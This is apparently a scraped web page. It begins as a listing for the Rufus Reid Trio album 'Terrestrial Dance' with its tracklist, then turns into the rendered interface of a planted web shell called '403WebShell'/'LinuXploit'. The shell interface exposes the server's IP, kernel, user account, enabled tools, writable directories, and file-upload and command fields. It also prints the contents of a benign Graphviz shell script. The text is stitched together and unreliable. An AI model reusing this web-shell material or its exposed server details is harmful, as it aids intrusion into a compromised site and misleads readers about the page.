Rufus Reid Trio with Steve Allee and Duduka Da Fonseca, featuring the Sirius Quartet

Terrestrial Dance

Newvelle Records (2017)

Tracklist
  1. This I Ask of You
  2. Its Time to Shout It Out
  3. Tippin’
  4. Tranescape
  5. Celestial Dance
  6. You Make Me Smile
  7. Falling In Love
  8. Cedar’s Blues
403WebShell
403Webshell
Server IP : 23.235.221.107  /  Your IP : 216.73.216.166
Web Server : Apache
System : Linux drums.jazzcorner.com 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64
User : rreid ( 1011)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /bin/lneato
#!/bin/sh
FILES=""
MLEVEL="0"
LMODE="async"
FLAGS=

usage="echo usage: lneato [-V] [-lm (sync|async)] [-el (0|1)] <filename>"

if test "x$DOTTYOPTIONS" != "x"
then
    options=$DOTTYOPTIONS
else
    options="$@"
fi

set -- $options

for i in "$@"
do
	if test "x$i" = "x$1"
	then
		case $i in
		-V)
			shift
			echo "lneato version 95 (04-18-95)"
			FLAGS=$FLAGS" -V"
			;;
		-lm)
			shift
			LMODE="$1"
			shift
			if test "x$LMODE" != "xsync" -a "x$LMODE" != "xasync"
			then
				$usage
				exit 1
			fi
			;;
		-el)
			shift
			MLEVEL="$1"
			shift
			if test "x$MLEVEL" != "x0" -a "x$MLEVEL" != "x1"
			then
				$usage
				exit 1
			fi
			;;
		-?*)
			$usage
			exit 1
			;;
		*)
			FILES="$FILES '"$1"'"
			shift
			;;
		esac
	fi
done

if test "x$MLEVEL" != "x0"
then
	echo "FILES  = $FILES"
	echo "MLEVEL = $MLEVEL"
	echo "LMODE  = $LMODE"
fi

if test "x$DOTTYPATH" != "x"
then
    LEFTYPATH="$DOTTYPATH:$LEFTYPATH"
fi

CMDS="dotty.layoutmode = '$LMODE';"
CMDS="$CMDS dotty.mlevel = $MLEVEL; dot.mlevel =  $MLEVEL;"

if test "x$FILES" = "x"
then
    FILES=null
fi
for i in $FILES
do
	CMDS="$CMDS dotty.createviewandgraph($i,'file',null,null);"
done

lefty $FLAGS -e "
load ('dotty.lefty');

checkpath = function () {
	if (tablesize(dotty) > 0);	# because tablesize(undef) returns "" not 0
	else {
		echo('You must set LEFTYPATH to the lefty lib directory path name.');
		exit();
	}
};
checkpath ();

dotty.protogt.lserver = 'neato';
dotty.protogt.graph.type = 'graph';
dotty.init ();
monitorfile = dotty.monitorfile;
$CMDS
txtview ('off');
"

Youez - 2016 - github.com/yon3zu
LinuXploit